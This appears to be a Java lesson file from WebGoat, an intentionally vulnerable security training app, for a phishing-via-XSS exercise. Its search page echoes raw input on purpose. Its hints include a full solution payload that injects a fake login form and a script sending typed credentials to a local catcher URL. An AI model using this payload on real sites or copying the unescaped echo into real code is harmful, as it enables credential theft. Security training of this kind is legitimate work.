package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.List; import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; import org.apache.ecs.html.B; import org.apache.ecs.html.BR; import org.apache.ecs.html.Comment; import org.apache.ecs.html.H1; import org.apache.ecs.html.HR; import org.apache.ecs.html.Input; import org.apache.ecs.html.TD; import org.apache.ecs.html.TH; import org.apache.ecs.html.TR; import org.apache.ecs.html.Table; import org.owasp.webgoat.Catcher; import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; /*************************************************************************************************** * * * This file is part of WebGoat, an Open Web Application Security Project utility. For details, * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * * This program is free software; you can redistribute it and/or modify it under the terms of the * GNU General Public License as published by the Free Software Foundation; either version 2 of the * License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. * * You should have received a copy of the GNU General Public License along with this program; if * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA * 02111-1307, USA. * * Getting Source ============== * * Source for this application is maintained at code.google.com, a repository for free software * projects. * * For details, please see http://code.google.com/p/webgoat/ * * @author Bruce Mayhew WebGoat * @created March 13, 2007 */ public class Phishing extends LessonAdapter { /** * Description of the Field */ protected final static String SEARCH = "Username"; private String searchText; /** * Description of the Method * * @param s * Description of the Parameter * @return Description of the Return Value */ private boolean postedCredentials(WebSession s) { String postedToCookieCatcher = getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING); // return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING)); // } /** * Description of the Method * * @param s * Description of the Parameter * @return Description of the Return Value */ protected Element createContent(WebSession s) { ElementContainer ec = new ElementContainer(); try { searchText = s.getParser().getRawParameter(SEARCH, ""); // // ec.addElement(makeSearch(s)); if (postedCredentials(s)) { makeSuccess(s); } } catch (Exception e) { s.setMessage("Error generating " + this.getClass().getName()); } return (ec); } protected Element makeSearch(WebSession s) { ElementContainer ec = new ElementContainer(); ec.addElement(new H1().addElement("WebGoat Search ")); Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setAlign("center"); TR tr = new TR(); tr.addElement(new TD().addElement(" ").setColSpan(2)); t.addElement(tr); if (s.isColor()) { t.setBorder(1); } tr = new TR(); tr.addElement(new TH().addElement("This facility will search the WebGoat source.").setColSpan(2) .setAlign("center")); t.addElement(tr); tr = new TR(); tr.addElement(new TD().addElement(" ").setColSpan(2)); t.addElement(tr); TR row1 = new TR(); row1.addElement(new TD(new B(new StringElement("Search: "))).setAlign("right")); Input input1 = new Input(Input.TEXT, SEARCH, searchText); row1.addElement(new TD(input1).setAlign("left")); t.addElement(row1); Element b = ECSFactory.makeButton("Search"); t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center")); ec.addElement(t); if (!searchText.equals("")) { ec.addElement(new BR()); ec.addElement(new HR()); ec.addElement(new BR()); ec.addElement(new StringElement("Results for: " + searchText)); ec.addElement(new Comment("Search results")); ec.addElement(new BR()); ec.addElement(new BR()); ec.addElement(new B(new StringElement("No results were found."))); ec.addElement(new Comment("End of Search results")); } return (ec); } /** * Gets the hints attribute of the CluesScreen object * * @return The hints value */ protected List getHints(WebSession s) { List hints = new ArrayList(); hints.add("Try adding HTML to the search field to create a fake authentication form.
" + "Try to make the form look official."); hints .add("Try:
" + "<form name="phish"><br><br><HR><H3>This feature requires account login:</H2" + "><br><br>Enter Username:<br><input type="text" " + "name="user"><br>Enter Password:<br><input type="password" " + "name = "pass"><br></form><br><br><HR>"); hints .add("Add functionality that can post a request, a button might work

" + "After getting the button on the page, don't forget you will need to steal the credentials and post them to:
" + "http://localhost/webgoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE"); hints .add("Try:
" + "<input type="submit" name="login" " + "value="login">" + "

In the whole script:

" + "<form name="phish"><br><br><HR><H3>This feature requires account login:</H2" + "><br><br>Enter Username:<br><input type="text" " + "name="user"><br>Enter Password:<br><input type="password" " + "name = "pass"><br><input type="submit" name="login" " + "value="login" onclick="hack()"></form><br><br><HR>"); hints .add("Make the button perform an action on submit,
" + "adding an onclick=\"hack()\" might work
" + "Don't forget to add the hack() javascript function" + "

In the whole script:

" + "<form name="phish"><br><br><HR><H3>This feature requires account login:</H2" + "><br><br>Enter Username:<br><input type="text" " + "name="user"><br>Enter Password:<br><input type="password" " + "name = "pass"><br><input type="submit" name="login" " + "value="login" onclick="hack()"></form><br><br><HR>
" + "Also, check firebug. Does the search form need to be terminated for this to work...? (</form>)"); hints .add("You need to create the hack() function. This function will pull the credentials from the " + "webpage and post them to the WebGoat catcher servlet.
" + "
Some useful code snippets:

doucument.phish.user.value - will access the user field" + "
XssImage = new Image(); XssImage.src=SOME_URL = will perform a post" + "
javascript string concatentation uses a \"+\"

" + "

The entire javascript portion:

" + "<script>function hack(){ " + "XSSImage=new Image; XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user="+" + "document.phish.user.value + "&password=" + document.phish.pass.value + "";" + "alert("Had this been a real attack... Your credentials were just stolen." + "\nUser Name = " + document.phish.user.value + "\nPassword = " + document.phish.pass.value);} " + "</script>"); hints .add("Complete solution for this lesson:

" + "</form><script>function hack(){ " + "XSSImage=new Image; XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user="+" + "document.phish.user.value + "&password=" + document.phish.pass.value + "";" + "alert("Had this been a real attack... Your credentials were just stolen." + "\nUser Name = " + document.phish.user.value + "\nPassword = " + document.phish.pass.value);} " + "</script><form name="phish"><br><br><HR><H3>This feature requires account login:</H2" + "><br><br>Enter Username:<br><input type="text" " + "name="user"><br>Enter Password:<br><input type="password" " + "name = "pass"><br><input type="submit" name="login" " + "value="login" onclick="hack()"></form><br><br><HR>"); /** * password
*
*